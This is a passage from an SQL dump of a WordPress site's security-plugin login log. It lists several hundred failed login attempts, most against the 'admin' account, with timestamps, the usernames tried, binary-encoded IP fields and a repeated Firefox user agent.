rv:62.0) Gecko/20100101 Firefox/62.0'),(434,644,1624542306.246803,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���갞','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(435,645,1624542372.581548,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(436,646,1624542413.709369,1,'loginFailInvalidUsername','0x1999',0,'\0\0\0\0\0\0\0\0\0\0����f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(437,647,1624542500.502955,1,'loginFailInvalidUsername','thiquyen',0,'\0\0\0\0\0\0\0\0\0\0��}�ܓ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(438,648,1624542551.552376,1,'loginFailInvalidUsername','thanhxuan',0,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(439,654,1624543040.669663,1,'loginFailInvalidUsername','visor',0,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(440,658,1624543333.214713,1,'loginFailInvalidUsername','123456',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(441,658,1624543333.223653,1,'loginFailInvalidUsername','123456',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(442,662,1624543615.033939,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���찍','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(443,663,1624543637.319281,1,'loginFailInvalidUsername','111',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(444,665,1624543752.367995,1,'loginFailInvalidUsername','wpjp_employer',0,'\0\0\0\0\0\0\0\0\0\0��g\'�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(445,666,1624543806.722508,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����eW','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(446,666,1624543806.744841,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����eW','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(447,671,1624544087.996349,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(448,672,1624544118.587977,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\5`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(449,672,1624544119.700028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\5`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(450,673,1624544206.072591,1,'loginFailInvalidUsername','1234',0,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(451,673,1624544206.105938,1,'loginFailInvalidUsername','1234',0,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(452,674,1624544256.479725,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(453,674,1624544256.503459,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(454,675,1624544433.463173,1,'loginFailInvalidUsername','wordpress',0,'\0\0\0\0\0\0\0\0\0\0��]}K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(455,678,1624544591.503054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(456,679,1624544682.074969,1,'loginFailInvalidUsername','wmbadmin',0,'\0\0\0\0\0\0\0\0\0\0��)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(457,680,1624544691.242648,1,'loginFailInvalidUsername','tuition',0,'\0\0\0\0\0\0\0\0\0\0���>[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(458,682,1624544883.122459,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���ƀ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(459,683,1624544886.415073,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��� �G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(460,685,1624544983.938066,1,'loginFailInvalidUsername','tester1',0,'\0\0\0\0\0\0\0\0\0\0�����y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(461,686,1624545011.524234,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(462,688,1624545172.568272,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��o��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(463,689,1624545232.758825,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(464,690,1624545271.751577,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0�����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(465,692,1624545471.069512,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��%:0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(466,693,1624545543.614990,1,'loginFailInvalidUsername','valentin',0,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(467,694,1624545591.067589,1,'loginFailInvalidUsername','testtest',0,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(468,696,1624545737.705941,1,'loginFailInvalidUsername','thomas',0,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(469,696,1624545737.761717,1,'loginFailInvalidUsername','thomas',0,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(470,697,1624545782.880137,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��Xc��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(471,700,1624545983.944368,1,'loginFailInvalidUsername','vektor',0,'\0\0\0\0\0\0\0\0\0\0��ݏ0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(472,701,1624546029.398789,1,'loginFailInvalidUsername','username',0,'\0\0\0\0\0\0\0\0\0\0��>ҹ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(473,702,1624546103.000275,1,'loginFailInvalidUsername','usuario',0,'\0\0\0\0\0\0\0\0\0\0��g\rZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(474,703,1624546160.499109,1,'loginFailInvalidUsername','vendor',0,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(475,705,1624546274.483501,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��]�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(476,706,1624546300.885493,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(477,707,1624546394.689710,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��>ҹ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(478,708,1624546462.292250,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0�����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(479,709,1624546574.222763,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(480,710,1624546630.231979,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(481,713,1624546820.948817,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(482,715,1624546933.072491,1,'loginFailInvalidUsername','support',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(483,716,1624546990.821863,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(484,717,1624547024.154884,1,'loginFailInvalidUsername','developer',0,'\0\0\0\0\0\0\0\0\0\0��]�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(485,718,1624547111.958296,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(486,719,1624547170.408608,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(487,720,1624547252.936211,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(488,721,1624547284.980666,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0��>ҹ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(489,722,1624547354.331969,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��͓m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(490,724,1624547463.281526,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��(zt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(491,726,1624547601.757639,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(492,727,1624547656.499706,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��-7<n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(493,728,1624547711.646779,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��_ء�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(494,730,1624547792.586152,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(495,730,1624547792.594183,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(496,731,1624547839.483547,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0���E4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(497,734,1624548032.256005,1,'loginFailInvalidUsername','guest',0,'\0\0\0\0\0\0\0\0\0\0��-u��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(498,738,1624548291.681100,1,'loginFailInvalidUsername','hello',0,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(499,746,1624548737.964088,1,'loginFailInvalidUsername','gestion',0,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(500,747,1624548791.902493,1,'loginFailInvalidUsername','greatnet',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(501,754,1624549193.830498,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��>�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(502,755,1624549211.975411,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(503,759,1624549462.209613,1,'loginFailInvalidUsername','az',0,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(504,760,1624549496.500145,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(505,762,1624549578.642392,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��h�*�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(506,766,1624549713.258848,1,'loginFailInvalidUsername','admina',0,'\0\0\0\0\0\0\0\0\0\0���H�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(507,767,1624549793.921845,1,'loginFailInvalidUsername','admina',0,'\0\0\0\0\0\0\0\0\0\0��Cͭ@','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(508,769,1624549901.844294,1,'loginFailInvalidUsername','andre',0,'\0\0\0\0\0\0\0\0\0\0�� R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(509,769,1624549901.878167,1,'loginFailInvalidUsername','andre',0,'\0\0\0\0\0\0\0\0\0\0�� R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(510,774,1624550263.648268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����eW','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(511,779,1624550633.330653,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0��}�ܓ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(512,781,1624550707.343795,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���\"%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(513,783,1624550882.586890,1,'loginFailInvalidUsername','coco',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(514,784,1624550936.446737,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(515,787,1624551122.887823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l�\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(516,794,1624551572.531199,1,'loginFailInvalidUsername','omar',0,'\0\0\0\0\0\0\0\0\0\0��6��q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(517,795,1624551641.494225,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(518,796,1624551681.049431,1,'loginFailInvalidUsername','presse',0,'\0\0\0\0\0\0\0\0\0\0���,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(519,798,1624551873.686297,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��T� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(520,800,1624552010.656591,1,'loginFailInvalidUsername','sergio',0,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(521,803,1624552132.908807,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(522,805,1624552249.167055,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(523,806,1624552314.559066,1,'loginFailInvalidUsername','shan',0,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(524,806,1624552314.603666,1,'loginFailInvalidUsername','shan',0,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(525,818,1624552913.495396,1,'loginFailInvalidUsername','novo',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(526,819,1624552935.608852,1,'loginFailInvalidUsername','john',0,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(527,831,1624553862.612128,1,'loginFailInvalidUsername','itadmin',0,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(528,832,1624553918.528549,1,'loginFailInvalidUsername','itadmin',0,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(529,836,1624554256.615204,1,'loginFailInvalidUsername','monica',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(530,837,1624554311.455171,1,'loginFailInvalidUsername','nicole',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(531,839,1624554465.498643,1,'loginFailInvalidUsername','mike',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(532,840,1624554503.497877,1,'loginFailInvalidUsername','karen',0,'\0\0\0\0\0\0\0\0\0\0��ν!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(533,841,1624554572.617500,1,'loginFailInvalidUsername','lisa',0,'\0\0\0\0\0\0\0\0\0\0����o)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(534,842,1624554683.791023,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(535,842,1624554683.805492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(536,849,1624555113.731762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(537,849,1624555113.793268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(538,850,1624555131.833492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>�A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(539,851,1624555213.283581,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(540,854,1624555392.178963,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(541,855,1624555462.619334,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(542,861,1624555749.074294,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4BRE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(543,862,1624555821.782298,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��PP��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(544,873,1624556665.650418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6��q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(545,873,1624556665.683550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6��q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(546,874,1624556718.446872,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8�T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(547,874,1624556718.453986,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8�T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(548,875,1624556802.631034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gJ6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(549,878,1624556991.846888,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(550,879,1624557065.226395,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(551,880,1624557273.949916,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(552,881,1624557319.614769,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(553,889,1624557933.007854,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(554,892,1624558124.559089,1,'loginFailInvalidUsername','lee_admin',0,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(555,893,1624558177.219910,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��gF�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(556,895,1624558303.640021,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��͓m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(557,896,1624558353.174436,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z]c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(558,897,1624558414.069522,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(559,898,1624558472.619211,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(560,898,1624558472.670510,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(561,899,1624558552.394080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���x�K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(562,900,1624558592.849053,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��£�&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(563,901,1624558636.420314,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(564,902,1624558712.445802,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(565,903,1624558752.326624,1,'loginFailInvalidUsername','webadmin',0,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; 